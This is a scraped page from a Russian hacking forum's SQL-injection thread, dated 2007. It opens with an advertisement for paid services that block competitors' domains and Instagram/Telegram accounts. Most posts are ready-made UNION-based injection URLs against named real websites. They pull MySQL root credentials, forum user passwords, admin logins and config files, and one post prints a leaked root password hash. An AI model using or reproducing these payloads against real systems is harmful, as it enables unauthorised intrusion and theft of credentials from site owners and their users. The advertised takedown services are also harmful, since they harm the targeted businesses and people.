УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
SQL Инъекции

Страница 219 из 1242

219

Опции темы

Поиск в этой теме

Опции просмотра

#2181

10.05.2007, 21:54

Constantine

Members of Antichat - Level 5

Регистрация: 24.11.2006

Сообщений: 927

Провел на форуме:
7192869

Репутация: 3033

Идею дал, дораскрутите сами

Код:

http://triplebuffer.devmaster.net/file.php?id=-7+union+select+1,2,convert(version()+using+latin1)/*&page=2

__________________

Дети индиго - это бездари, не надо песен! В пять лет едва говорить начинают, мы в этом возрасте стихи наизусть читали!

з.ы http://www.youtube.com/watch?v=sNsQe0KByRY Я ПлакалЪ

sql-not_fin

#2182

11.05.2007, 10:37

~~Серенький~~

Banned

Регистрация: 13.04.2007

Сообщений: 123

Провел на форуме:
921520

Репутация: 572

sql-not_fin

Фотосайт.ру

Код:

http://www.photosight.ru/pforum/showflat.php?Cat=&Board=photo_common&page=0&view=collapsed&sb=5&o=&fpart=all&Number=-658026+union+select+1,2,3,aes_decrypt(aes_encrypt(concat_ws(0x3a,user(),version(),database()),0x55),0x55)/*

вывод в заголовке, довести до ума не получилось, таблицы не подобрал.

Последний раз редактировалось _Pantera_; 11.05.2007 в 22:41..

#2183

11.05.2007, 16:54

kamaz

Познающий

Регистрация: 31.01.2007

Сообщений: 88

Провел на форуме:
631013

Репутация: 453

Отправить сообщение для kamaz с помощью ICQ

2Серенький

Код:

http://www.photosight.ru/pforum/showflat.php?Cat=&Board=photo_common&page=0&view=collapsed&sb=5&o=&fpart=all&Number=-658026+union+select+1,2,3,aes_decrypt(aes_encrypt(concat_ws(0x3a,user,password),0x55),0x55)%20from%20mysql.user/*

Последний раз редактировалось _Pantera_; 11.05.2007 в 22:42..

#2184

11.05.2007, 18:32

Grey

AMA - Level 2

Регистрация: 10.06.2006

Сообщений: 1,113

Провел на форуме:
17668503

Репутация: 5826

Код:

http://kosmopoisk.org/ufo_technology/show1.html?id=-1+union+select+1,2,3,4,concat(database(),char(58),user(),char(58),version()),6,7,8/*
http://kosmopoisk.org/ufo_technology/show1.html?id=-1+union+select+1,2,3,4,5,6,7,8+from+guestbook/*

Код:

http://www.setbook.ru/announces-r.php?id=5499&pageid=-1+union+select+1,2,concat(database(),char(58),user(),char(58),version()),4,5/*
http://www.setbook.ru/announces-r.php?id=5499&pageid=-1+union+select+1,2,concat(username,char(58),user_password),4,5+from+phpbb_users+limit+1,1/*

Код:

http://www.aqualung.ru/konkurs.php?photo=-1+union+select+1,convert(concat(database(),char(58),user(),char(58),version()),char),3,4,5,6,7,8/*

#2185

11.05.2007, 18:49

Joker-jar

Постоянный

Регистрация: 11.03.2007

Сообщений: 581

Провел на форуме:
4172659

Репутация: 646

Отправить сообщение для Joker-jar с помощью ICQ

Предлагаю Вашему вниманию очень пикантную скулю

. Федерация хоккея России. PHP-скрипт имеет права рута доступа к мускулу, поэтому можно творить очень многое, а именно:

Код:

http://www.1tvcup.fhr.ru/news/?id=-1+union+select+1,2,3,concat(user,':',password)+from+mysql.user/*

Хотя есть и более простой способ увести пароль от MySQL - через конфиг phpbb

(Смотреть "исходники" страницы)

Код:

http://www.1tvcup.fhr.ru/news/?id=-1+union+select+1,2,3,load_file('/home/www/htdocs/www/conf/config.php')/*

А вот и юзвери форума:

Код:

http://www.1tvcup.fhr.ru/news/?id=-1+union+select+1,2,3,concat(username,':',user_password,':',user_icq)+from+home.phpbb_users+limit+1/*

Ну и конечно, админы, там их докуя фроде

Код:

http://www.1tvcup.fhr.ru/news/?id=-1+union+select+1,2,3,concat(login,'%20:%20',password,'%20:%20',comment)+from+online_feb.fhr_admins+limit+0,1/*

Также отлично работает into outfile.

P.S. Пожалуйста, не хакайте, только ознакамливаемся.

#2186

11.05.2007, 20:43

Constantine

Members of Antichat - Level 5

Регистрация: 24.11.2006

Сообщений: 927

Провел на форуме:
7192869

Репутация: 3033

5-я версия мускула, лимит в помощь, 30 таблиц.. ответ где то там)

Код:

http://www.maplestoryatlas.com/field.php?id=-33+union+select+1,TABLE_NAME,version()+from+INFORMATION_SCHEMA.TABLES+limit+1,1/*

Здесь все тривиально

Код:

http://tenleaders.com/field.php?id=-12+union+select+concat_ws(char(58),user,password),2,3+from+mysql.user/*

__________________

з.ы http://www.youtube.com/watch?v=sNsQe0KByRY Я ПлакалЪ

Последний раз редактировалось Constantine; 11.05.2007 в 20:49..

#2187

11.05.2007, 22:40

p-range

Участник форума

Регистрация: 05.02.2006

Сообщений: 168

Провел на форуме:
749524

Репутация: 715

Отправить сообщение для p-range с помощью ICQ

edu-all.ru

Цитата:

http://www.edu-all.ru/pages/forum/thread.asp?idthr=1'+or+1=(SELECT+TOP+1+TABLE_NAME+ FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+NO T+IN+('dtproperties','clients','posting','sysconst raints','syssegments','tems','thread'))--

Цитата:

http://www.edu-all.ru/pages/forum/thread.asp?idthr=1'+or+1=(SELECT+TOP+1+COLUMN_NAME +FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME= 'clients'+AND+COLUMN_NAME+NOT+IN+('akt_cl','col_cl ','comment_cl','dateend_cl','dateup_cl','dats_cl', 'dog_cl','har_cl','id_cl','mesto_cl','name_cl','op l_cl','sh_cl','srok_cl','st_cl','vid_cl'))--

_хмм_

#2188

12.05.2007, 21:12

KPOT_f!nd

Познавший АНТИЧАТ

Регистрация: 25.08.2006

Сообщений: 1,524

Провел на форуме:
3405508

Репутация: 1745

Код:

http://www.turkuaz.us/news_det.php?newsId=-587+union+select+1,user(),database(),version(),5,6,7,8,9/*&catId=32

Код:

http://lonuestro.us/sectionfiles/article.php?id=-218+union+select+1,database(),version(),4,5,6,7,user(),9,10,11,12/*

так сильно не увлекался находкой таблиц. . .

#2189

12.05.2007, 23:39

kamaz

Познающий

Регистрация: 31.01.2007

Сообщений: 88

Провел на форуме:
631013

Репутация: 453

Чтобы увидеть скулю, нужна регистрация.
Для тех, кому влом регистрироваться -
Login - kokok
Pass - 123456

Код:

http://www.myflavour.nl/forum.php?view=write&tid=748&action=reply&quote=-20244%20union%20select%201,2,user()/*

Код:

http://www.geelix.com/hud.php?id=-238622154%20union%20select%201,2,concat_ws(char(58),idUser,logins,email,passw)%20from%20user/*

Код:

http://www.cbisis.be/baptises.php?an=-1992%20union%20select%20id,concat_ws(char(58),username,password,email,icq),3,4%20from%20cbisis.forum_users/*

#2190

13.05.2007, 10:11

KPOT_f!nd

Познавший АНТИЧАТ

Регистрация: 25.08.2006

Сообщений: 1,524

Провел на форуме:
3405508

Репутация: 1745

Код:

http://www.parks.it/news/dettaglio.php?id=-1221+union+select+1,user,password,4,user(),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+mysql.user/*

root:0a9236882f7cf8a1
massimo@www.comunic.it

Страница 219 из 1242

219

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая	k00p3r	Чужие Статьи	0	13.06.2005 11:26
SQL инъекция и Oracle, часть 2	k00p3r	Чужие Статьи	0	13.06.2005 11:24
Sql инъекция и Oracle, часть первая	k00p3r	Чужие Статьи	0	13.06.2005 11:23
Внедрение Sql кода с завязанными глазами	k00p3r	Чужие Статьи	0	12.06.2005 20:48
SQL Injection в Oracle	k00p3r	Чужие Статьи	0	12.06.2005 12:41

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход